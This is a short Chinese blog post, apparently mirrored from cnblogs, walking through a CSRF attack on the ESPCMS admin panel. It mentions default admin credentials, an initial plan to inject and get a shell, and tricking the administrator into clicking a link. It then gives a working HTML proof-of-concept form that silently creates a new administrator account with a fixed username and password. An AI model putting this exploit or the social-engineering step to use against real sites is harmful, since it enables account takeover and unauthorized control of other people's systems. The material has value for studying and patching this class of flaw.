zoukankan      html  css  js  c++  java
  • ESPCMS的CSRF添加管理员账号

    ESPCMS的CSRF添加管理员账号

    前言

    这里开始的思路是先注入进去 然后getshell 但是不关CSRF什么事

    换思路 看了一下群消息  大哥发了一个视频  后台名称admin  admin123

    0X01 CSRF攻击之旅

    进后台添加管理   这里 为了试验环境 需要把你加的管理先删除了

     

    然后POST抓包 添加用户的这里构造CSRF

     

    然后社工管理员

    管理点击后

     

    成功

     exp

    <html>
      <!-- CSRF PoC - generated by Burp Suite Professional -->
      <body>
        <form action="http://www.espcms.com/adminsoft/index.php?archive=management&action=managesava" method="POST">
          <input type="hidden" name="inputclass" value="add" />
          <input type="hidden" name="tab" value="true" />
          <input type="hidden" name="username" value="zhong" />
          <input type="hidden" name="password" value="zhongzhong" />
          <input type="hidden" name="password2" value="zhongzhong" />
          <input type="hidden" name="name" value="zhong" />
          <input type="hidden" name="sex" value="1" />
          <input type="hidden" name="powergroup" value="1" />
          <input type="hidden" name="inputclassid" value="1" />
          <input type="hidden" name="isremote" value="1" />
          <input type="submit" value="Submit request" />
        </form>
      </body>
    </html>
  • 相关阅读:
    UML与ER图
    动态规划法求背包问题
    回溯法求解n皇后和迷宫问题
    优先队列和二叉堆
    快排,归并和Shell排序
    关系型数据库设计范式
    Python使用Redis数据库
    Python urllib简单使用
    当SQL UPDATE遇到EXISTS(SELECT ...)时
    关于使用mybatis的一个惨痛教训
  • 原文地址:https://www.cnblogs.com/-zhong/p/11061884.html
Copyright © 2011-2022 走看看